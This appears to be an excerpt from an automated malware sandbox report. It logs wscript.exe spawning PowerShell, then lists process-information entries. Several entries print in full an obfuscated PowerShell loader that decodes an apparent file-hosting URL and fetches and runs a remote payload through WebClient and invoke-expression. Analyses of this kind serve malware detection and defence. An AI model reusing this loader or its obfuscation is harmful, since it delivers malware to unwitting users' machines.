            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Cygnid Hemiteratic Orthodiagraphy217 Malleolar lovreglens Aflbsledninger Sagsaktens Traadrullerne Nonscalar Nondeclaratory Yawnups Abet226 Stammefejderne33 Avitaminosis Aabenlyses Fusionsmusikken Earthworms kursusmodulet Bolledejene Rollefag Eyras Windowshopping Usr Disboscation91 Cygnid Hemiteratic Orthodiagraphy217 Malleolar lovreglens Aflbsledninger Sagsaktens Traadrullerne Nonscalar Nondeclaratory Yawnups Abet226 Stammefejderne33 Avitaminosis Aabenlyses Fusionsmusikken Earthworms kursusmodulet Bolledejene Rollefag Eyras Windowshopping Usr Disboscation91';If (${host}.CurrentCulture) {$Clairaudience++;}Function Trosfllen($Gendigtende){$Statshemmelighedernes=$Gendigtende.Length-$Clairaudience;$Prehensible='SUBsTRI';$Prehensible+='ng';For( $Bilkberne195=2;$Bilkberne195 -lt $Statshemmelighedernes;$Bilkberne195+=3){$Cygnid+=$Gendigtende.$Prehensible.Invoke( $Bilkberne195, $Clairaudience);}$Cygnid;}function Extensionalism($Medullitis){ & ($Impotens) ($Medullitis);}$Czardas=Trosfllen ' OMVroM,zBaiAalR.lA,a.e/St5no.Ko0Ge Br(BaWIni MnP,d,doMew esRe pNC TF, sp1Ta0 ,. E0S.;Pn ,W ,iSknS 6En4 l;Go TrxSk6Fo4 ;f, FrGuvH :Ma1L 2,a1.n.Pa0Re)B, GE,e.ecAnkWioH / G2N.0an1St0.y0T,1.b0.s1m. CFVei rr IeEnfLyoPrxSo/Co1Ty2S,1 A. t0 D ';$Preassuring=Trosfllen ' aUH sKoeOprFa-neA,ugK,e nCot.k ';$lovreglens=Trosfllen 'D hHjtOct .pAcsOs:Tr/Sa/Hod SrTei,fvSkeS .GigL,o.iohygAxlTueB,. DcReo CmEr/FiuP.c i?BeeAnxa.pSkoA,rVet I=BidP oCaw.in OlS.o qaOvdTr&LoiMad M=Ko1 ey S-UnsBorArWMey t9P.W sPaTBox EODe0SeaA.cUs2 FNJiV agAn8 JA ,2,ea .U .mEonBiTRi3BeVSgqunyJ CP ';$Unhomologic=Trosfllen ' >Te ';$Impotens=Trosfllen 'PeiUneStxUm ';$Aarigt='Traadrullerne';$Databasemodellerne = Trosfllen 'B eTrcK.h,noMy K%U.a YpT pKvdChaHatBraUl% S\ oD,vesim,eo,rcL.r.iaRetKniEasOliStnDigNo. IS ppb.iCo W,&Bj&Ki E.eUncX h .oFo At H ';Extensionalism (Trosfllen ' S$,ngH,lVioKubSoa lM : bGrit.gRatCrhG.aGetu.c ah.r=.h(ZacFlm KdJ, Pa/ eceu E.$AnDBraTet ,aSnb Aa FsKle AmR oEld.eeOrlL,l,keA rMonFoeHe)lu ');Extensionalism (Trosfllen 'Ki$R gOsl aoPrbS aTul.r:K.MT.a,tlSylUneAuo TlSkaFarS,= ,$MelS oN v er ,e rg .l eeT nC,sJr.mis ,pScl PiFot V( S$MeUErn Ch .oAdmUroTel.koH,g,biFlcdi)co ');Extensionalism (Trosfllen ' P[B.NHaeT,t .. .S .eFerB,vFoi.tcNoeT,POvoLiiChnSltBiMRea Kn DaOkg.ieSarC,] .:.i:DiSKleSpcSeu irSliIntUny.iP Cr.eo ,t So fcF,o lTe .l=Bu Se[ NBeeFutAl.BeSAteSocfruMar OiElt ay.oP Kr.noSutVeoSacKioCol UT fy.ip.eeGa]Ls: o:S.TPalDosMo1ps2 , ');$lovreglens=$Malleolar[0];$Fjedrene= (Trosfllen ' o$.lgKul.eoEtbD.aSilA.:esAFonD,i PsDee.liNdkMyo intriF.cGu= ,N Pe.aw H-AfOjebToj keFocP.t , DeSSpy esSntheeBimUl.,dN ReS.tRe.LuWspePrbSpC ,lE,iFoen nV t');$Fjedrene+=$bigthatch[1];Extensionalism ($Fjedrene);Extensionalism (Trosfllen 'do$UhA,rnFiidesBeePriFrkVroStnsai .cIr.LeHDue ,aGidAte,orImsBu[Eu$StP SrDeeTuaSysBosDiuPrr Di TnR gSo]Cr=S $SuCStzRha,mrJod fa.esVa ');$Padle
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Cygnid Hemiteratic Orthodiagraphy217 Malleolar lovreglens Aflbsledninger Sagsaktens Traadrullerne Nonscalar Nondeclaratory Yawnups Abet226 Stammefejderne33 Avitaminosis Aabenlyses Fusionsmusikken Earthworms kursusmodulet Bolledejene Rollefag Eyras Windowshopping Usr Disboscation91 Cygnid Hemiteratic Orthodiagraphy217 Malleolar lovreglens Aflbsledninger Sagsaktens Traadrullerne Nonscalar Nondeclaratory Yawnups Abet226 Stammefejderne33 Avitaminosis Aabenlyses Fusionsmusikken Earthworms kursusmodulet Bolledejene Rollefag Eyras Windowshopping Usr Disboscation91';If (${host}.CurrentCulture) {$Clairaudience++;}Function Trosfllen($Gendigtende){$Statshemmelighedernes=$Gendigtende.Length-$Clairaudience;$Prehensible='SUBsTRI';$Prehensible+='ng';For( $Bilkberne195=2;$Bilkberne195 -lt $Statshemmelighedernes;$Bilkberne195+=3){$Cygnid+=$Gendigtende.$Prehensible.Invoke( $Bilkberne195, $Clairaudience);}$Cygnid;}function Extensionalism($Medullitis){ & ($Impotens) ($Medullitis);}$Czardas=Trosfllen ' OMVroM,zBaiAalR.lA,a.e/St5no.Ko0Ge Br(BaWIni MnP,d,doMew esRe pNC TF, sp1Ta0 ,. E0S.;Pn ,W ,iSknS 6En4 l;Go TrxSk6Fo4 ;f, FrGuvH :Ma1L 2,a1.n.Pa0Re)B, GE,e.ecAnkWioH / G2N.0an1St0.y0T,1.b0.s1m. CFVei rr IeEnfLyoPrxSo/Co1Ty2S,1 A. t0 D ';$Preassuring=Trosfllen ' aUH sKoeOprFa-neA,ugK,e nCot.k ';$lovreglens=Trosfllen 'D hHjtOct .pAcsOs:Tr/Sa/Hod SrTei,fvSkeS .GigL,o.iohygAxlTueB,. DcReo CmEr/FiuP.c i?BeeAnxa.pSkoA,rVet I=BidP oCaw.in OlS.o qaOvdTr&LoiMad M=Ko1 ey S-UnsBorArWMey t9P.W sPaTBox EODe0SeaA.cUs2 FNJiV agAn8 JA ,2,ea .U .mEonBiTRi3BeVSgqunyJ CP ';$Unhomologic=Trosfllen ' >Te ';$Impotens=Trosfllen 'PeiUneStxUm ';$Aarigt='Traadrullerne';$Databasemodellerne = Trosfllen 'B eTrcK.h,noMy K%U.a YpT pKvdChaHatBraUl% S\ oD,vesim,eo,rcL.r.iaRetKniEasOliStnDigNo. IS ppb.iCo W,&Bj&Ki E.eUncX h .oFo At H ';Extensionalism (Trosfllen ' S$,ngH,lVioKubSoa lM : bGrit.gRatCrhG.aGetu.c ah.r=.h(ZacFlm KdJ, Pa/ eceu E.$AnDBraTet ,aSnb Aa FsKle AmR oEld.eeOrlL,l,keA rMonFoeHe)lu ');Extensionalism (Trosfllen 'Ki$R gOsl aoPrbS aTul.r:K.MT.a,tlSylUneAuo TlSkaFarS,= ,$MelS oN v er ,e rg .l eeT nC,sJr.mis ,pScl PiFot V( S$MeUErn Ch .oAdmUroTel.koH,g,biFlcdi)co ');Extensionalism (Trosfllen ' P[B.NHaeT,t .. .S .eFerB,vFoi.tcNoeT,POvoLiiChnSltBiMRea Kn DaOkg.ieSarC,] .:.i:DiSKleSpcSeu irSliIntUny.iP Cr.eo ,t So fcF,o lTe .l=Bu Se[ NBeeFutAl.BeSAteSocfruMar OiElt ay.oP Kr.noSutVeoSacKioCol UT fy.ip.eeGa]Ls: o:S.TPalDosMo1ps2 , ');$lovreglens=$Malleolar[0];$Fjedrene= (Trosfllen ' o$.lgKul.eoEtbD.aSilA.:esAFonD,i PsDee.liNdkMyo intriF.cGu= ,N Pe.aw H-AfOjebToj keFocP.t , DeSSpy esSntheeBimUl.,dN ReS.tRe.LuWspePrbSpC ,lE,iFoen nV t');$Fjedrene+=$bigthatch[1];Extensionalism ($Fjedrene);Extensionalism (Trosfllen 'do$UhA,rnFiidesBeePriFrkVroStnsai .cIr.LeHDue ,aGidAte,orImsBu[Eu$StP SrDeeTuaSysBosDiuPrr Di TnR gSo]Cr=S $SuCStzRha,mrJod fa.esVa ');$Padle
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Cygnid Hemiteratic Orthodiagraphy217 Malleolar lovreglens Aflbsledninger Sagsaktens Traadrullerne Nonscalar Nondeclaratory Yawnups Abet226 Stammefejderne33 Avitaminosis Aabenlyses Fusionsmusikken Earthworms kursusmodulet Bolledejene Rollefag Eyras Windowshopping Usr Disboscation91 Cygnid Hemiteratic Orthodiagraphy217 Malleolar lovreglens Aflbsledninger Sagsaktens Traadrullerne Nonscalar Nondeclaratory Yawnups Abet226 Stammefejderne33 Avitaminosis Aabenlyses Fusionsmusikken Earthworms kursusmodulet Bolledejene Rollefag Eyras Windowshopping Usr Disboscation91';If (${host}.CurrentCulture) {$Clairaudience++;}Function Trosfllen($Gendigtende){$Statshemmelighedernes=$Gendigtende.Length-$Clairaudience;$Prehensible='SUBsTRI';$Prehensible+='ng';For( $Bilkberne195=2;$Bilkberne195 -lt $Statshemmelighedernes;$Bilkberne195+=3){$Cygnid+=$Gendigtende.$Prehensible.Invoke( $Bilkberne195, $Clairaudience);}$Cygnid;}function Extensionalism($Medullitis){ & ($Impotens) ($Medullitis);}$Czardas=Trosfllen ' OMVroM,zBaiAalR.lA,a.e/St5no.Ko0Ge Br(BaWIni MnP,d,doMew esRe pNC TF, sp1Ta0 ,. E0S.;Pn ,W ,iSknS 6En4 l;Go TrxSk6Fo4 ;f, FrGuvH :Ma1L 2,a1.n.Pa0Re)B, GE,e.ecAnkWioH / G2N.0an1St0.y0T,1.b0.s1m. CFVei rr IeEnfLyoPrxSo/Co1Ty2S,1 A. t0 D ';$Preassuring=Trosfllen ' aUH sKoeOprFa-neA,ugK,e nCot.k ';$lovreglens=Trosfllen 'D hHjtOct .pAcsOs:Tr/Sa/Hod SrTei,fvSkeS .GigL,o.iohygAxlTueB,. DcReo CmEr/FiuP.c i?BeeAnxa.pSkoA,rVet I=BidP oCaw.in OlS.o qaOvdTr&LoiMad M=Ko1 ey S-UnsBorArWMey t9P.W sPaTBox EODe0SeaA.cUs2 FNJiV agAn8 JA ,2,ea .U .mEonBiTRi3BeVSgqunyJ CP ';$Unhomologic=Trosfllen ' >Te ';$Impotens=Trosfllen 'PeiUneStxUm ';$Aarigt='Traadrullerne';$Databasemodellerne = Trosfllen 'B eTrcK.h,noMy K%U.a YpT pKvdChaHatBraUl% S\ oD,vesim,eo,rcL.r.iaRetKniEasOliStnDigNo. IS ppb.iCo W,&Bj&Ki E.eUncX h .oFo At H ';Extensionalism (Trosfllen ' S$,ngH,lVioKubSoa lM : bGrit.gRatCrhG.aGetu.c ah.r=.h(ZacFlm KdJ, Pa/ eceu E.$AnDBraTet ,aSnb Aa FsKle AmR oEld.eeOrlL,l,keA rMonFoeHe)lu ');Extensionalism (Trosfllen 'Ki$R gOsl aoPrbS aTul.r:K.MT.a,tlSylUneAuo TlSkaFarS,= ,$MelS oN v er ,e rg .l eeT nC,sJr.mis ,pScl PiFot V( S$MeUErn Ch .oAdmUroTel.koH,g,biFlcdi)co ');Extensionalism (Trosfllen ' P[B.NHaeT,t .. .S .eFerB,vFoi.tcNoeT,POvoLiiChnSltBiMRea Kn DaOkg.ieSarC,] .:.i:DiSKleSpcSeu irSliIntUny.iP Cr.eo ,t So fcF,o lTe .l=Bu Se[ NBeeFutAl.BeSAteSocfruMar OiElt ay.oP Kr.noSutVeoSacKioCol UT fy.ip.eeGa]Ls: o:S.TPalDosMo1ps2 , ');$lovreglens=$Malleolar[0];$Fjedrene= (Trosfllen ' o$.lgKul.eoEtbD.aSilA.:esAFonD,i PsDee.liNdkMyo intriF.cGu= ,N Pe.aw H-AfOjebToj keFocP.t , DeSSpy esSntheeBimUl.,dN ReS.tRe.LuWspePrbSpC ,lE,iFoen nV t');$Fjedrene+=$bigthatch[1];Extensionalism ($Fjedrene);Extensionalism (Trosfllen 'do$UhA,rnFiidesBeePriFrkVroStnsai .cIr.LeHDue ,aGidAte,orImsBu[Eu$StP SrDeeTuaSysBosDiuPrr Di TnR gSo]Cr=S $SuCStzRha,mrJod fa.esVa ');$PadleJump to behavior
            Suspicious powershell command line found
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Cygnid Hemiteratic Orthodiagraphy217 Malleolar lovreglens Aflbsledninger Sagsaktens Traadrullerne Nonscalar Nondeclaratory Yawnups Abet226 Stammefejderne33 Avitaminosis Aabenlyses Fusionsmusikken Earthworms kursusmodulet Bolledejene Rollefag Eyras Windowshopping Usr Disboscation91 Cygnid Hemiteratic Orthodiagraphy217 Malleolar lovreglens Aflbsledninger Sagsaktens Traadrullerne Nonscalar Nondeclaratory Yawnups Abet226 Stammefejderne33 Avitaminosis Aabenlyses Fusionsmusikken Earthworms kursusmodulet Bolledejene Rollefag Eyras Windowshopping Usr Disboscation91';If (${host}.CurrentCulture) {$Clairaudience++;}Function Trosfllen($Gendigtende){$Statshemmelighedernes=$Gendigtende.Length-$Clairaudience;$Prehensible='SUBsTRI';$Prehensible+='ng';For( $Bilkberne195=2;$Bilkberne195 -lt $Statshemmelighedernes;$Bilkberne195+=3){$Cygnid+=$Gendigtende.$Prehensible.Invoke( $Bilkberne195, $Clairaudience);}$Cygnid;}function Extensionalism($Medullitis){ & ($Impotens) ($Medullitis);}$Czardas=Trosfllen ' OMVroM,zBaiAalR.lA,a.e/St5no.Ko0Ge Br(BaWIni MnP,d,doMew esRe pNC TF, sp1Ta0 ,. E0S.;Pn ,W ,iSknS 6En4 l;Go TrxSk6Fo4 ;f, FrGuvH :Ma1L 2,a1.n.Pa0Re)B, GE,e.ecAnkWioH / G2N.0an1St0.y0T,1.b0.s1m. CFVei rr IeEnfLyoPrxSo/Co1Ty2S,1 A. t0 D ';$Preassuring=Trosfllen ' aUH sKoeOprFa-neA,ugK,e nCot.k ';$lovreglens=Trosfllen 'D hHjtOct .pAcsOs:Tr/Sa/Hod SrTei,fvSkeS .GigL,o.iohygAxlTueB,. DcReo CmEr/FiuP.c i?BeeAnxa.pSkoA,rVet I=BidP oCaw.in OlS.o qaOvdTr&LoiMad M=Ko1 ey S-UnsBorArWMey t9P.W sPaTBox EODe0SeaA.cUs2 FNJiV agAn8 JA ,2,ea .U .mEonBiTRi3BeVSgqunyJ CP ';$Unhomologic=Trosfllen ' >Te ';$Impotens=Trosfllen 'PeiUneStxUm ';$Aarigt='Traadrullerne';$Databasemodellerne = Trosfllen 'B eTrcK.h,noMy K%U.a YpT pKvdChaHatBraUl% S\ oD,vesim,eo,rcL.r.iaRetKniEasOliStnDigNo. IS ppb.iCo W,&Bj&Ki E.eUncX h .oFo At H ';Extensionalism (Trosfllen ' S$,ngH,lVioKubSoa lM : bGrit.gRatCrhG.aGetu.c ah.r=.h(ZacFlm KdJ, Pa/ eceu E.$AnDBraTet ,aSnb Aa FsKle AmR oEld.eeOrlL,l,keA rMonFoeHe)lu ');Extensionalism (Trosfllen 'Ki$R gOsl aoPrbS aTul.r:K.MT.a,tlSylUneAuo TlSkaFarS,= ,$MelS oN v er ,e rg .l eeT nC,sJr.mis ,pScl PiFot V( S$MeUErn Ch .oAdmUroTel.koH,g,biFlcdi)co ');Extensionalism (Trosfllen ' P[B.NHaeT,t .. .S .eFerB,vFoi.tcNoeT,POvoLiiChnSltBiMRea Kn DaOkg.ieSarC,] .:.i:DiSKleSpcSeu irSliIntUny.iP Cr.eo ,t So fcF,o lTe .l=Bu Se[ NBeeFutAl.BeSAteSocfruMar OiElt ay.oP Kr.noSutVeoSacKioCol UT fy.ip.eeGa]Ls: o:S.TPalDosMo1ps2 , ');$lovreglens=$Malleolar[0];$Fjedrene= (Trosfllen ' o$.lgKul.eoEtbD.aSilA.:esAFonD,i PsDee.liNdkMyo intriF.cGu= ,N Pe.aw H-AfOjebToj keFocP.t , DeSSpy esSntheeBimUl.,dN ReS.tRe.LuWspePrbSpC ,lE,iFoen nV t');$Fjedrene+=$bigthatch[1];Extensionalism ($Fjedrene);Extensionalism (Trosfllen 'do$UhA,rnFiidesBeePriFrkVroStnsai .cIr.LeHDue ,aGidAte,orImsBu[Eu$StP SrDeeTuaSysBosDiuPrr Di TnR gSo]Cr=S $SuCStzRha,mrJod fa.esVa ');$Padle
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Cygnid Hemiteratic Orthodiagraphy217 Malleolar lovreglens Aflbsledninger Sagsaktens Traadrullerne Nonscalar Nondeclaratory Yawnups Abet226 Stammefejderne33 Avitaminosis Aabenlyses Fusionsmusikken Earthworms kursusmodulet Bolledejene Rollefag Eyras Windowshopping Usr Disboscation91 Cygnid Hemiteratic Orthodiagraphy217 Malleolar lovreglens Aflbsledninger Sagsaktens Traadrullerne Nonscalar Nondeclaratory Yawnups Abet226 Stammefejderne33 Avitaminosis Aabenlyses Fusionsmusikken Earthworms kursusmodulet Bolledejene Rollefag Eyras Windowshopping Usr Disboscation91';If (${host}.CurrentCulture) {$Clairaudience++;}Function Trosfllen($Gendigtende){$Statshemmelighedernes=$Gendigtende.Length-$Clairaudience;$Prehensible='SUBsTRI';$Prehensible+='ng';For( $Bilkberne195=2;$Bilkberne195 -lt $Statshemmelighedernes;$Bilkberne195+=3){$Cygnid+=$Gendigtende.$Prehensible.Invoke( $Bilkberne195, $Clairaudience);}$Cygnid;}function Extensionalism($Medullitis){ & ($Impotens) ($Medullitis);}$Czardas=Trosfllen ' OMVroM,zBaiAalR.lA,a.e/St5no.Ko0Ge Br(BaWIni MnP,d,doMew esRe pNC TF, sp1Ta0 ,. E0S.;Pn ,W ,iSknS 6En4 l;Go TrxSk6Fo4 ;f, FrGuvH :Ma1L 2,a1.n.Pa0Re)B, GE,e.ecAnkWioH / G2N.0an1St0.y0T,1.b0.s1m. CFVei rr IeEnfLyoPrxSo/Co1Ty2S,1 A. t0 D ';$Preassuring=Trosfllen ' aUH sKoeOprFa-neA,ugK,e nCot.k ';$lovreglens=Trosfllen 'D hHjtOct .pAcsOs:Tr/Sa/Hod SrTei,fvSkeS .GigL,o.iohygAxlTueB,. DcReo CmEr/FiuP.c i?BeeAnxa.pSkoA,rVet I=BidP oCaw.in OlS.o qaOvdTr&LoiMad M=Ko1 ey S-UnsBorArWMey t9P.W sPaTBox EODe0SeaA.cUs2 FNJiV agAn8 JA ,2,ea .U .mEonBiTRi3BeVSgqunyJ CP ';$Unhomologic=Trosfllen ' >Te ';$Impotens=Trosfllen 'PeiUneStxUm ';$Aarigt='Traadrullerne';$Databasemodellerne = Trosfllen 'B eTrcK.h,noMy K%U.a YpT pKvdChaHatBraUl% S\ oD,vesim,eo,rcL.r.iaRetKniEasOliStnDigNo. IS ppb.iCo W,&Bj&Ki E.eUncX h .oFo At H ';Extensionalism (Trosfllen ' S$,ngH,lVioKubSoa lM : bGrit.gRatCrhG.aGetu.c ah.r=.h(ZacFlm KdJ, Pa/ eceu E.$AnDBraTet ,aSnb Aa FsKle AmR oEld.eeOrlL,l,keA rMonFoeHe)lu ');Extensionalism (Trosfllen 'Ki$R gOsl aoPrbS aTul.r:K.MT.a,tlSylUneAuo TlSkaFarS,= ,$MelS oN v er ,e rg .l eeT nC,sJr.mis ,pScl PiFot V( S$MeUErn Ch .oAdmUroTel.koH,g,biFlcdi)co ');Extensionalism (Trosfllen ' P[B.NHaeT,t .. .S .eFerB,vFoi.tcNoeT,POvoLiiChnSltBiMRea Kn DaOkg.ieSarC,] .:.i:DiSKleSpcSeu irSliIntUny.iP Cr.eo ,t So fcF,o lTe .l=Bu Se[ NBeeFutAl.BeSAteSocfruMar OiElt ay.oP Kr.noSutVeoSacKioCol UT fy.ip.eeGa]Ls: o:S.TPalDosMo1ps2 , ');$lovreglens=$Malleolar[0];$Fjedrene= (Trosfllen ' o$.lgKul.eoEtbD.aSilA.:esAFonD,i PsDee.liNdkMyo intriF.cGu= ,N Pe.aw H-AfOjebToj keFocP.t , DeSSpy esSntheeBimUl.,dN ReS.tRe.LuWspePrbSpC ,lE,iFoen nV t');$Fjedrene+=$bigthatch[1];Extensionalism ($Fjedrene);Extensionalism (Trosfllen 'do$UhA,rnFiidesBeePriFrkVroStnsai .cIr.LeHDue ,aGidAte,orImsBu[Eu$StP SrDeeTuaSysBosDiuPrr Di TnR gSo]Cr=S $SuCStzRha,mrJod fa.esVa ');$Padle
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Cygnid Hemiteratic Orthodiagraphy217 Malleolar lovreglens Aflbsledninger Sagsaktens Traadrullerne Nonscalar Nondeclaratory Yawnups Abet226 Stammefejderne33 Avitaminosis Aabenlyses Fusionsmusikken Earthworms kursusmodulet Bolledejene Rollefag Eyras Windowshopping Usr Disboscation91 Cygnid Hemiteratic Orthodiagraphy217 Malleolar lovreglens Aflbsledninger Sagsaktens Traadrullerne Nonscalar Nondeclaratory Yawnups Abet226 Stammefejderne33 Avitaminosis Aabenlyses Fusionsmusikken Earthworms kursusmodulet Bolledejene Rollefag Eyras Windowshopping Usr Disboscation91';If (${host}.CurrentCulture) {$Clairaudience++;}Function Trosfllen($Gendigtende){$Statshemmelighedernes=$Gendigtende.Length-$Clairaudience;$Prehensible='SUBsTRI';$Prehensible+='ng';For( $Bilkberne195=2;$Bilkberne195 -lt $Statshemmelighedernes;$Bilkberne195+=3){$Cygnid+=$Gendigtende.$Prehensible.Invoke( $Bilkberne195, $Clairaudience);}$Cygnid;}function Extensionalism($Medullitis){ & ($Impotens) ($Medullitis);}$Czardas=Trosfllen ' OMVroM,zBaiAalR.lA,a.e/St5no.Ko0Ge Br(BaWIni MnP,d,doMew esRe pNC TF, sp1Ta0 ,. E0S.;Pn ,W ,iSknS 6En4 l;Go TrxSk6Fo4 ;f, FrGuvH :Ma1L 2,a1.n.Pa0Re)B, GE,e.ecAnkWioH / G2N.0an1St0.y0T,1.b0.s1m. CFVei rr IeEnfLyoPrxSo/Co1Ty2S,1 A. t0 D ';$Preassuring=Trosfllen ' aUH sKoeOprFa-neA,ugK,e nCot.k ';$lovreglens=Trosfllen 'D hHjtOct .pAcsOs:Tr/Sa/Hod SrTei,fvSkeS .GigL,o.iohygAxlTueB,. DcReo CmEr/FiuP.c i?BeeAnxa.pSkoA,rVet I=BidP oCaw.in OlS.o qaOvdTr&LoiMad M=Ko1 ey S-UnsBorArWMey t9P.W sPaTBox EODe0SeaA.cUs2 FNJiV agAn8 JA ,2,ea .U .mEonBiTRi3BeVSgqunyJ CP ';$Unhomologic=Trosfllen ' >Te ';$Impotens=Trosfllen 'PeiUneStxUm ';$Aarigt='Traadrullerne';$Databasemodellerne = Trosfllen 'B eTrcK.h,noMy K%U.a YpT pKvdChaHatBraUl% S\ oD,vesim,eo,rcL.r.iaRetKniEasOliStnDigNo. IS ppb.iCo W,&Bj&Ki E.eUncX h .oFo At H ';Extensionalism (Trosfllen ' S$,ngH,lVioKubSoa lM : bGrit.gRatCrhG.aGetu.c ah.r=.h(ZacFlm KdJ, Pa/ eceu E.$AnDBraTet ,aSnb Aa FsKle AmR oEld.eeOrlL,l,keA rMonFoeHe)lu ');Extensionalism (Trosfllen 'Ki$R gOsl aoPrbS aTul.r:K.MT.a,tlSylUneAuo TlSkaFarS,= ,$MelS oN v er ,e rg .l eeT nC,sJr.mis ,pScl PiFot V( S$MeUErn Ch .oAdmUroTel.koH,g,biFlcdi)co ');Extensionalism (Trosfllen ' P[B.NHaeT,t .. .S .eFerB,vFoi.tcNoeT,POvoLiiChnSltBiMRea Kn DaOkg.ieSarC,] .:.i:DiSKleSpcSeu irSliIntUny.iP Cr.eo ,t So fcF,o lTe .l=Bu Se[ NBeeFutAl.BeSAteSocfruMar OiElt ay.oP Kr.noSutVeoSacKioCol UT fy.ip.eeGa]Ls: o:S.TPalDosMo1ps2 , ');$lovreglens=$Malleolar[0];$Fjedrene= (Trosfllen ' o$.lgKul.eoEtbD.aSilA.:esAFonD,i PsDee.liNdkMyo intriF.cGu= ,N Pe.aw H-AfOjebToj keFocP.t , DeSSpy esSntheeBimUl.,dN ReS.tRe.LuWspePrbSpC ,lE,iFoen nV t');$Fjedrene+=$bigthatch[1];Extensionalism ($Fjedrene);Extensionalism (Trosfllen 'do$UhA,rnFiidesBeePriFrkVroStnsai .cIr.LeHDue ,aGidAte,orImsBu[Eu$StP SrDeeTuaSysBosDiuPrr Di TnR gSo]Cr=S $SuCStzRha,mrJod fa.esVa ');$PadleJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD9B9554B1 push ebp; iretd 5_2_00007FFD9B955538
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_04C0426D push ebx; ret 9_2_04C042DA
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_04C0EC78 pushfd ; retf 9_2_04C0EC79
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_079D21A8 push eax; mov dword ptr [esp], ecx9_2_079D21B4
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_079D1D28 push eax; mov dword ptr [esp], ecx9_2_079D21B4
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
